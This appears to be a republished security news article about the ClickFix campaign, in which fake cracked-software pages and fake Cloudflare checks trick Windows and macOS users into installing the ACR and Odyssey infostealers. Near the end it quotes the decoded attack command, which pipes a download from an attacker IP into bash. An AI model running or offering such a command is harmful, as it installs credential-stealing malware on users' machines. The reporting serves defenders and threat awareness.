New ClickFix Attack Targeting Windows and macOS Users to Deploy Infostealer Malware

   November 14, 2025  Posted in CyberSecurityNews

New ClickFix Attack Targeting Windows and macOS Users to Deploy Infostealer Malware

A growing social engineering technique called ClickFix has emerged as one of the most successful methods for distributing malware in recent months.

This attack tricks users into copying and running commands directly into their operating systems command line interface, ultimately installing dangerous information-stealing software.

The technique has proven remarkably effective because it bypasses traditional email security solutions and operates within browser sandboxes where most security tools cannot detect the malicious activity.

The attack typically begins when users search for cracked software through search engines. Cybercriminals create fake landing pages hosted on trusted platforms like Google Colab, Drive, Sites, and Groups to avoid being blocked by security systems.

These pages act as initial contact points that redirect victims based on their operating system. Windows users receive the ACR stealer, while macOS users are redirected to pages that deploy the Odyssey infostealer.

Intel471 security researchers identified this campaign in June 2025 during proactive malware hunting operations.

google

The investigation revealed that threat actors were successfully targeting both major operating systems through a single infrastructure.

Infection chain (Source - Intel471)
Infection chain (Source – Intel471)

What makes this attack particularly concerning is its fileless execution. When victims paste the commands, malicious payloads are pulled directly into memory, making them invisible to traditional security software.

Infection Mechanism and Technical Execution

For Windows users, the attack chain guides victims through several redirection points before reaching a MEGA file hosting page containing a password-protected ZIP archive.

Inside this archive sits the ACR stealer disguised as setup.exe. The malware not only steals credentials and personal data but also serves as a loader, installing additional threats such as SharkClipper, a cryptocurrency clipboard hijacker.

Fake Cloudflare security check which prompts users to run a ClickFix command (Source - Intel471)
Fake Cloudflare security check which prompts users to run a ClickFix command (Source – Intel471)

MacOS users encounter a different approach that involves a fake Cloudflare security check page. When users attempt to copy what appears to be a verification string, they actually copy a Base64-encoded shell command.

Once decoded, this command executes:-

curl - s http://45.135.232.33/droberto39774 | nohup bash

This command silently downloads and runs the Odyssey stealer, which harvests passwords, cookies, cryptocurrency wallets, Apple Notes, Keychain entries, and system data, then compresses everything into out.zip for exfiltration.

Follow us on Google News, LinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

googlenews



Source link